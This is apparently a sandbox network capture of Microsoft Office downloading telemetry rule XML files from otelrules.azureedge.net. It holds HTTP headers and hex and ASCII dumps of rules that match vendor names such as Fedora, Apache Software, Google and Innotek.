                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              43192.168.2.46375813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                              x-ms-request-id: 0231f811-b01e-003d-2a30-2cd32c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061603Z-r159446fcd77fkjdhC1DFWk94c00000001800000000007ay
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              44192.168.2.46376113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                              x-ms-request-id: 445643c3-401e-0078-193e-2c4d34000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061603Z-16ccfc49897x7dnlhC1DFWu7ac00000001r00000000091uy
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              45192.168.2.46375913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 448
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                              x-ms-request-id: 96ebe831-501e-007b-26b8-2b5ba2000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061603Z-16ccfc49897bsnckhC1DFW699w00000001ug000000000v1e
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              46192.168.2.46376213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                              x-ms-request-id: 069b3e38-001e-0028-2008-2cc49f000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061603Z-16ccfc49897x7dnlhC1DFWu7ac00000001rg00000000895p
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              47192.168.2.46376313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                              x-ms-request-id: a906e56b-601e-003d-1125-2c6f25000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061604Z-r159446fcd7rz5kshC1DFW2xxw000000010g000000003wub
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              48192.168.2.46376413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                              x-ms-request-id: 9c5aad6b-101e-0034-384b-2c96ff000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061604Z-r159446fcd77fkjdhC1DFWk94c000000010g00000000ehqh
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              49192.168.2.46376513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                              x-ms-request-id: 43d41d11-d01e-0028-575c-2b7896000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061604Z-16ccfc49897x7dnlhC1DFWu7ac00000001rg000000008960
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              50192.168.2.46376613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                              x-ms-request-id: ab6d546f-401e-005b-4408-2c9c0c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061604Z-16ccfc49897b872mhC1DFWqtb000000001q00000000061m7
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              51192.168.2.46376713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                              x-ms-request-id: abdc4130-301e-0000-3f2e-2ceecc000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061604Z-176bd8f9bc56w2rshC1DFWd88n00000001y000000000epak
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
